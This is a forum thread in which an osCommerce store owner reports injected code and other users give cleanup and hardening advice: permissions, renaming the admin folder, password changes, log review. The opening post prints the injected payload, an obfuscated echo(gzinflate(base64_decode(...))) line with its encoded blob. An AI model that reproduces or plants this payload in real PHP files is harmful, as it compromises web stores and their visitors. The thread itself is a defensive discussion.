12 replies to this topic

[mesko]

Hello.

It is now the second time i had to remove this code. The code appears in admin and catalog directories in index.php and login.php files. The code is:


#c3284d#
echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
#/c3284d#

how can i protect the web store from this?? and suggestions?

thanks

[Praful Kamble]

@mesko

1. All .php and .js files should have 444 permission.
2. All folders should have 555 permission.
3. Admin folder should be renamed.
4. Add captcha to create account, contact us, reviews and any other forms on site.
5. Make admin .htaccess protected.
6. Disable file manager.
8.  Frequently check website for any vulnerability through Google webmaster/ http://www.acunetix.com/vulnerability-scanner/

Also visit this link once Gary (@burt) given me to secure one of my site.

http://forums.oscommerce.com/topic/375288-updated-security-thread/

Praful

[geoffreywalton]

http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/
http://forums.oscommerce.com/index.php?showtopic=340995

These 2 show how to secure your site but as it has already been hacked you need to restore to a clean state and apply the fies or find the changes and clean them out.

Here is an extract from the how to on my web site

If you are going to do it yourself you have 2 choices:-
1) Wipe your entire site and restore the code and data from a known good backup and apply the security patches.
2) Cleanse the site.
Once you decide on how you are going to proceed, you also have to decide "shall I close the site whilst I am doing this?", this is a bit of a no brainer, lock down your site so no-one can get in. Do this by password protecting the root of your site, use your hosting control panel to do this and get to work. When you have finished and the site is OK again you can remove this password.
Even if you have a clean backup, you have to discover how they got in and plug the hole.
If you want to cleanse your site it yourself I have a list of useful tips and tricks such as:-
1) For an unsophisticated hack look at the date/time of the files on your site and see if there are files changed at a date/time that you did not do.
2) Look in those files and see if there is some suspicious code.
3) If there is, remove the "suspicious" code.
4) Check the logs for that period and see how they got in. You have to check the access logs and ftp access logs and look for suspicious entries.
Look for POST commands like
83.166.171.182 -[01/Jan/2011:08:51:14 -0500] "POST /catalog//admin/categories.php/login.php?cPath=&action=new_product_preview
This is the suspicious bit - categories.php/login.php
93.186.164.130 - - [31/Jan/2011:11:13:44 -0500] "POST /account.php HTTP/1.0" 200 9 www.xxxxxxxxx.com "-" "-" "-"
Here it is the "-" "-" "-" that is suspicious.
Use our "Contact Us" page to request a more complete copy of this set of Tips & Tricks.
If you have a basic OSC install but no backup, it might be better to save the data, wipe the site, reinstall, add on any contributions etc and lock down the site by installing the security contributions as recomended on the OSC Security forum.
If your site has been significantly amended and you do not have a clean back up then you will need to go through every file on the site and check its' contents. This can be done on a local copy of the files and a good editor.
Try these simple instructions on how to disinfect your site.
There are 2 contributions that highlight hacked files
VTS - Virus Threat System, excellent for initial cleansing.
Site Monitor - Better for ongoing monitoring
This one even tries to disinfect the site for a specific hack but can be altered for yours if required.
Site57 .info Hack Fix
Then make sure you install the Security Contributions recommended in the fist thread in the osc security forum, as they plug the known holes in the code, before you go live again.
You should also verify the permissions on the directories and files on your site are correct.
How to restore your database / To overwrite a db with a back-up
1. Take a back up of tye current db and store on your local PC.
2. Open file to be restored in notepad or other editor.
3. Check if "CREATE TABLE IF NOT EXISTS `address_book`" statement is present.
4. Check if "truncate table if exists `address_book`" statement is present.
5. Go into phpmy admin.
6. Select the db you want to import.
7. Select the Import tab.
8 Follow the options available.

HTH

G

[Praful Kamble]

geoffreywalton, on 26 June 2012 - 09:42 AM, said:

http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/
http://forums.oscommerce.com/index.php?showtopic=340995

These 2 show how to secure your site but as it has already been hacked you need to restore to a clean state and apply the fies or find the changes and clean them out.

Here is an extract from the how to on my web site

If you are going to do it yourself you have 2 choices:-
1) Wipe your entire site and restore the code and data from a known good backup and apply the security patches.
2) Cleanse the site.
Once you decide on how you are going to proceed, you also have to decide "shall I close the site whilst I am doing this?", this is a bit of a no brainer, lock down your site so no-one can get in. Do this by password protecting the root of your site, use your hosting control panel to do this and get to work. When you have finished and the site is OK again you can remove this password.
Even if you have a clean backup, you have to discover how they got in and plug the hole.
If you want to cleanse your site it yourself I have a list of useful tips and tricks such as:-
1) For an unsophisticated hack look at the date/time of the files on your site and see if there are files changed at a date/time that you did not do.
2) Look in those files and see if there is some suspicious code.
3) If there is, remove the "suspicious" code.
4) Check the logs for that period and see how they got in. You have to check the access logs and ftp access logs and look for suspicious entries.
Look for POST commands like
83.166.171.182 -[01/Jan/2011:08:51:14 -0500] "POST /catalog//admin/categories.php/login.php?cPath=&action=new_product_preview
This is the suspicious bit - categories.php/login.php
93.186.164.130 - - [31/Jan/2011:11:13:44 -0500] "POST /account.php HTTP/1.0" 200 9 www.xxxxxxxxx.com "-" "-" "-"
Here it is the "-" "-" "-" that is suspicious.
Use our "Contact Us" page to request a more complete copy of this set of Tips & Tricks.
If you have a basic OSC install but no backup, it might be better to save the data, wipe the site, reinstall, add on any contributions etc and lock down the site by installing the security contributions as recomended on the OSC Security forum.
If your site has been significantly amended and you do not have a clean back up then you will need to go through every file on the site and check its' contents. This can be done on a local copy of the files and a good editor.
Try these simple instructions on how to disinfect your site.
There are 2 contributions that highlight hacked files
VTS - Virus Threat System, excellent for initial cleansing.
Site Monitor - Better for ongoing monitoring
This one even tries to disinfect the site for a specific hack but can be altered for yours if required.
Site57 .info Hack Fix
Then make sure you install the Security Contributions recommended in the fist thread in the osc security forum, as they plug the known holes in the code, before you go live again.
You should also verify the permissions on the directories and files on your site are correct.
How to restore your database / To overwrite a db with a back-up
1. Take a back up of tye current db and store on your local PC.
2. Open file to be restored in notepad or other editor.
3. Check if "CREATE TABLE IF NOT EXISTS `address_book`" statement is present.
4. Check if "truncate table if exists `address_book`" statement is present.
5. Go into phpmy admin.
6. Select the db you want to import.
7. Select the Import tab.
8 Follow the options available.

HTH

G

@geoffreywalton

Hey Geoffrey,

Thank you for sharing the information and security threads. Very informative.

Praful

[DunWeb]

@mesko

Follow these steps to clean and secure your website:

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.

3) Delete the files on your hosting account before uploading the clean files.

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

10) If you feel you can not perform any of the above steps, you should seek professional help to ensure all malware is removed.


Chris

[MrPhil]

What osC version are you running? All the 2.2 versions have gaping security holes that need to be manually plugged. 2.3.1 is believed to be fairly secure. For 2.2, don't forget to follow the instructions to get rid of osC's file manager and define language system, and to change admin/ to some other name. Of course, all of this comes after cleaning out all traces of the hack...

Scan your PC (used to administer your site) for spyware, especially keystroke loggers and password sniffers. After any cleanup needed, change all your passwords again, as the hacker knows your current ones. Make sure you have your PC firewall up, so that you're alerted if any spyware tries to sneak out a message to the hacker with your passwords. Talk to your host to see if you can use SFTP (secure FTP) instead of regular FTP.

[mesko]

I will follow this instructions and answer back when i'm done.

I already removed the code from all the index.php, login.php and .htaccess

Thanks, guys.

[mesko]

I'm using oscommerce 2.3.1 and did many of these changes. But not all of them. I will also try to talk to our host for the secure FTP.

[Praful Kamble]

Did you renamed admin folder and made it .htacess protected?

Edited by Praful Kamble, 27 June 2012 - 01:25 PM.

[DunWeb]

@mesko

v2.3.1 has no known security issues.  So, either the server you are hosted with was hacked or the hacker is watching you online with password sniffers or email trackers.  I suggest that you change ALL of your passwords.



Chris

[mesko]

@Praful Kamble

Yes, did both a time ago.

@DunWeb

I cleared the infected files and changed the passwords, i hope thats enough for awhile.

Thanks.

[Praful Kamble]

@mesko

If you have done with all what chris told to do then it is okay.

Also if Google had banned your website in search engine then submit a reconsideration request from webmasters tool to inform google that your website is virus free.

Praful

[satish]

1. Never have your FTP or admin login details in one soft copy.
As most of the hacks happen(atleast if osc is 2.3.1) due to password stolen and not for any other reason.

2. Make sure and backdoors hacker has inserted are removed and images or folder with write permissions have .htaccess so code is not executed from there.